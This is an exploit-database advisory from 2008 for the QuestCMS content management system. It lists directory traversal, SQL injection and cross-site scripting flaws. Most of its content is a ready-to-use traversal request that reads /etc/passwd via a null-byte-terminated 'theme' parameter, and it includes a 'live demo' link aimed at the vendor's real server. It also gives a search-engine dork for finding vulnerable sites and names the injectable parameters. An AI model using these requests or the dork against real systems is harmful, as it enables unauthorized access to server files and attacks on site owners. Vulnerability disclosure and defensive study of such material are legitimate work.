Lucene search
D3b4gEDB-ID:6853HistoryOct 27, 2008 - 12:00 a.m.
QuestCMS - Cross-Site Scripting / Directory Traversal / SQL Injection
2008-10-2700:00:00
d3b4g
www.exploit-db.com
39
AI Score
7.4
Confidence
Low
--------------------------------------------------------------------------------
Title : Questcms Multiple Remote Vulnerabilities [XSS/Directory Traversal/sql]
--------------------------------------------------------------------------------
#Author: d3b4g
#contact: bl4ckend[at]gmail[dot]com
--------------------------------------------------------------------------------
Affected software:
--------------------------------------------------------------------------------
Application : Questwork Web Content Management system (QuestCMS)
URL : http://www.questwork.com
--------------------------------------------------------------------------------
dork : allinurl:"/questcms/"
--------------------------------------------------------------------------------
Directory traversal vulnibility
=============================
Exploit : questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html
Live demo : http://www.questwork.com/questcms/main/main.php?lang=tc&page=1&theme=../../../../../../../../etc/passwd%00.html
---------------------------------------------------------------------------------
sql injection:
==============
Vuln file:questcms/main/main.php?obj=[sql]
XSS:
====
exploit:/main/main.php?cx=[Xss]
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
greetz:
All my friends,milw0rm...
--------------------------------------------------------------------------------
--------------------------------- [ www.hotlism.org ] --------------------------------------
# milw0rm.com [2008-10-27]Related
cve
cve
prion
prion
Directory traversal
2008-10-28 19:46:00
Cross site scripting
2008-10-28 19:46:00
Sql injection
2008-10-28 19:46:00
cvelist
cvelist
nvd
nvd